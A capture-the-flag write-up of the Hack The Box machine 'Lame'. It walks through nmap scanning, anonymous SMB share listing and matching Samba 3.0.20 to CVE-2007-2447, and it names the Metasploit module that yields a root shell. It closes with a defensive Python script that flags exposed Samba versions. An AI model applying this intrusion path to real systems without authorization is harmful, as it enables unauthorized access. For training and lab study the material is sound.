Lame – Hack The Box

Machine: https://app.hackthebox.com/machines/Lame

Since this is the first machine of this journey, let's start by downloading the OpenVPN configuration from HTB and creating a quick alias to connect (I will be using Kali Linux, by the way, not the integrated Pwnbox):

$ echo "alias htb='sudo openvpn /home/kali/VPNs/htb.ovpn'" >> ~/.zshrc   # or ~/.bashrc

Log out and back in, then:

$ htb

Let’s start with a plain nmap:

$ nmap 10.10.10.3
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-08 04:22 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.04 seconds
$ ping 10.10.10.3
PING 10.10.10.3 (10.10.10.3) 56(84) bytes of data.
64 bytes from 10.10.10.3: icmp_seq=1 ttl=63 time=22.0 ms
64 bytes from 10.10.10.3: icmp_seq=2 ttl=63 time=22.6 ms
...

So nmap immediately claims the host is down, while ping clearly gets answers. The reason is that an unprivileged nmap cannot send raw packets, so its host discovery falls back to TCP connects to ports 80 and 443, neither of which is open here. You need to add the -Pn flag to skip host discovery and scan a machine that "doesn't respond to ping":

$ nmap 10.10.10.3 -Pn
...
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 4.78 seconds

The machine exposes SMB on 139/445, so let's enumerate the shares with a null (anonymous) session:

$ smbclient -L 10.10.10.3
Password for [WORKGROUP\kali]: (empty)
Anonymous login successful

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
tmp             Disk      oh noes!
opt             Disk      
IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))

Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

Server               Comment
---------            -------

Workgroup            Master
---------            -------
WORKGROUP            LAME

“oh noes!”? lol. Lame, I guess? Let’s see what we find in tmp:

$ smbclient //10.10.10.3/tmp
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                    D        0  Sun Jan  8 04:31:20 2023
  ..                  DR        0  Sat Oct 31 03:33:58 2020
  .ICE-unix           DH        0  Sun Jan  8 04:20:46 2023
  vmware-root         DR        0  Sun Jan  8 04:21:13 2023
  .X11-unix           DH        0  Sun Jan  8 04:21:12 2023
  .X0-lock            HR       11  Sun Jan  8 04:21:12 2023
  vgauthsvclog.txt.0   R     1600  Sun Jan  8 04:20:44 2023
  5574.jsvc_up         R        0  Sun Jan  8 04:21:50 2023

                7282168 blocks of size 1024. 5386552 blocks available

Of these files, only vgauthsvclog.txt.0 and .X0-lock are downloadable, and neither contains anything useful. None of the other shares seems to be useful either. Maybe we need to find some credentials first.

The other open services (FTP, SSH) did not accept connections without credentials either. However, the banners point to generally outdated software. Let's run a deeper scan with version detection and the vuln scripts to see if a known vulnerability shows up:

$ sudo nmap -Pn --script vuln,default -p21,22,139,445 -sV -O 10.10.10.3

It turns out Samba 3.0.20-Debian is vulnerable to CVE-2007-2447 (command injection through the "username map script" option). In the Metasploit framework, the exploit/multi/samba/usermap_script module exploits it, and the shell you land in is already root:

whoami
root
cat /root/root.txt
c3a***************************************
cat /home/makis/user.txt
e14***************************************
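The two steps that decided this box were the anonymous share listing and matching the Samba banner against a known CVE. The following script is an added example (not part of the original write-up or of any HTB tooling) that turns both into a repeatable check for a defender's SMB inventory: it parses the `smbclient -L` share table, pulls the Samba version out of the IPC$ comment, and flags the affected range for CVE-2007-2447 (3.0.0 up to but not including 3.0.25, where the fix shipped). The listing embedded below is a constructed copy of the output shown above; the function and constant names are my own.

```python
import re
from typing import NamedTuple, Optional

# Constructed sample: a copy of the `smbclient -L 10.10.10.3` listing from the
# write-up, embedded so the script runs offline (normally you would feed it the
# captured output of `smbclient -L HOST -N`).
SMBCLIENT_LISTING = """\
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))

Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LAME
"""


class Share(NamedTuple):
    name: str
    kind: str      # Disk, IPC, Printer or Device, as smbclient prints it
    comment: str


# One row of the share table: name, type keyword, optional free-text comment.
SHARE_LINE = re.compile(r"^\s*(\S+)\s+(Disk|IPC|Printer|Device)\s*(.*?)\s*$")
VERSION_RE = re.compile(r"Samba\s+(\d+)\.(\d+)\.(\d+)")

# CVE-2007-2447 ("username map script" command injection) affects Samba
# 3.0.0 <= version < 3.0.25; the 3.0.25 release carries the fix.
CVE_2007_2447_FIRST = (3, 0, 0)
CVE_2007_2447_FIXED = (3, 0, 25)


def parse_shares(listing: str) -> list[Share]:
    """Return the rows of the first share table in an `smbclient -L` listing."""
    shares: list[Share] = []
    in_table = False
    for line in listing.splitlines():
        if re.match(r"^\s*Sharename\s+Type\s+Comment", line):
            in_table = True          # header row found, rows follow
            continue
        if not in_table:
            continue
        if not line.strip():
            break                    # a blank line ends the share table
        if line.strip().startswith("---"):
            continue                 # column underline row
        m = SHARE_LINE.match(line)
        if m:
            shares.append(Share(m.group(1), m.group(2), m.group(3)))
    return shares


def samba_version(listing: str) -> Optional[tuple[int, int, int]]:
    """Extract the Samba version advertised in the IPC$/ADMIN$ comment, if any."""
    m = VERSION_RE.search(listing)
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def vulnerable_to_cve_2007_2447(version: Optional[tuple[int, int, int]]) -> bool:
    """Banner-based triage only: the bug is also gated on `username map script`
    being set in smb.conf, which a banner cannot tell you, so treat True as
    'patch-level exposed', not as proof of exploitability."""
    if version is None:
        return False
    return CVE_2007_2447_FIRST <= version < CVE_2007_2447_FIXED


def listed_disk_shares(listing: str) -> list[str]:
    """Names of Disk shares visible to the (here: anonymous) session."""
    return [s.name for s in parse_shares(listing) if s.kind == "Disk"]


if __name__ == "__main__":
    ver = samba_version(SMBCLIENT_LISTING)
    print("Samba version:", ver)
    print("CVE-2007-2447 exposed:", vulnerable_to_cve_2007_2447(ver))
    for share in parse_shares(SMBCLIENT_LISTING):
        print(f"{share.name:<10} {share.kind:<8} {share.comment}")
```

The version check deliberately compares tuples rather than strings, so "3.0.9" sorts before "3.0.20" as it should; the `-Debian` suffix is ignored because distribution packages backport fixes without bumping the upstream number, which is exactly why a banner match should only open a ticket, not close one.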

There are a few more interesting paths on this machine. My guess is there is more than one way to the flags, but I will leave this up to you to explore!

So what did we learn from this machine? Sometimes a host is so open you don’t know where to start =).

PS: Hi Makis!